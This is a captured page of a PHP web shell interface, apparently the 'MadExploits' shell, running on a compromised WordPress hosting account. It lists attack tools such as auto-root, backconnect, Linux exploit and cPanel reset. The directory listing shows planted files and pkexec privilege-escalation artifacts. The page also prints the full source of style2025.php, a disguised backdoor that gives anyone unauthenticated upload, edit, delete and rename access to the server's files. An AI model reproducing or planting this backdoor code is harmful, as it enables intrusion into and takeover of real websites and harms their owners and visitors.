Linux host17.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 199.188.200.68 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
8.1.33
shipvipnc2024
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
shipvipnc2024 /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
026b3c
[ DIR ]
drwxr-xr-x
3fbe1
[ DIR ]
dr-xr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
item
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.hta
6.54
KB
-rw-r--r--
.htaccess
717
B
-r-xr-xr-x
.mad-root
0
B
-rw-r--r--
admin.phtml
1.81
MB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
context.php
405
B
-rw-r--r--
google53f508616afad7bf.html
53
B
-rw-r--r--
index.php
430.05
KB
-r--r--r--
robots.txt
22
B
-rw-r--r--
sitemap.xml
314
B
-rw-r--r--
style2025.php
4.19
KB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
541
B
-rw-r--r--
wp-bot.php
1.82
KB
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
2.83
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.95
KB
-rw-r--r--
wp-loada.php
2.32
KB
-rw-r--r--
wp-loadb.php
2.14
KB
-rw-r--r--
wp-login.php
50.16
KB
-rw-r--r--
wp-mail.php
8.34
KB
-rw-r--r--
wp-settings.php
28.35
KB
-rw-r--r--
wp-signup.php
33.58
KB
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
xmlrpc.php
3.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : style2025.php
<?php session_start(); $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); function displayDirectory($path) { $items = array_diff(scandir($path), ['.', '..']); echo "<h3>Current Directory: $path</h3><ul>"; foreach ($items as $item) { $itemPath = realpath($path . DIRECTORY_SEPARATOR . $item); if (is_dir($itemPath)) { echo "<li><a href='?path=$itemPath'>$item</a></li>"; } else { echo "<li>$item <a href='?path=$path&action=edit&item=$item'>Edit</a> | <a href='?path=$path&action=delete&item=$item'>Delete</a> | <a href='?path=$path&action=rename&item=$item'>Rename</a></li>"; } } echo "</ul>"; } function handleFileUpload($path) { if (!empty($_FILES['file']['name'])) { $target = $path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { echo "<p>File uploaded successfully!</p>"; } else { echo "<p>Failed to upload file.</p>"; } } } function createNewFolder($path) { if (!empty($_POST['folder_name'])) { $folderPath = $path . DIRECTORY_SEPARATOR . $_POST['folder_name']; if (!file_exists($folderPath)) { mkdir($folderPath); echo "<p>Folder created: {$_POST['folder_name']}</p>"; } else { echo "<p>Folder already exists.</p>"; } } } function createNewFile($path) { if (!empty($_POST['file_name'])) { $filePath = $path . DIRECTORY_SEPARATOR . $_POST['file_name']; if (!file_exists($filePath)) { file_put_contents($filePath, ''); echo "<p>File created: {$_POST['file_name']}</p>"; } else { echo "<p>File already exists.</p>"; } } } function editFile($filePath) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) { file_put_contents($filePath, $_POST['content']); echo "<p>File updated successfully!</p>"; } $content = file_exists($filePath) ? htmlspecialchars(file_get_contents($filePath)) : ''; echo "<form method='POST'><textarea name='content' style='width:100%; height:300px;'>$content</textarea><br><button type='submit'>Save</button></form>"; } function deleteFile($filePath) { if (file_exists($filePath)) { unlink($filePath); echo "<p>File deleted successfully.</p>"; } } function renameItem($filePath) { if (!empty($_POST['new_name'])) { $newPath = dirname($filePath) . DIRECTORY_SEPARATOR . $_POST['new_name']; if (rename($filePath, $newPath)) { echo "<p>Item renamed successfully.</p>"; } else { echo "<p>Failed to rename item.</p>"; } } else { echo "<form method='POST'><input type='text' name='new_name' placeholder='New Name'><button type='submit'>Rename</button></form>"; } } if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_FILES['file'])) { handleFileUpload($path); } elseif (isset($_POST['folder_name'])) { createNewFolder($path); } elseif (isset($_POST['file_name'])) { createNewFile($path); } } if (isset($_GET['action']) && isset($_GET['item'])) { $itemPath = $path . DIRECTORY_SEPARATOR . $_GET['item']; switch ($_GET['action']) { case 'edit': editFile($itemPath); break; case 'delete': deleteFile($itemPath); break; case 'rename': renameItem($itemPath); break; } } echo "<a href='?path=" . dirname($path) . "'>Go Up</a>"; displayDirectory($path); echo "<h3>Upload File</h3><form method='POST' enctype='multipart/form-data'><input type='file' name='file'><button type='submit'>Upload</button></form>"; echo "<h3>Create Folder</h3><form method='POST'><input type='text' name='folder_name' placeholder='Folder Name'><button type='submit'>Create</button></form>"; echo "<h3>Create File</h3><form method='POST'><input type='text' name='file_name' placeholder='File Name'><button type='submit'>Create</button></form>";
Close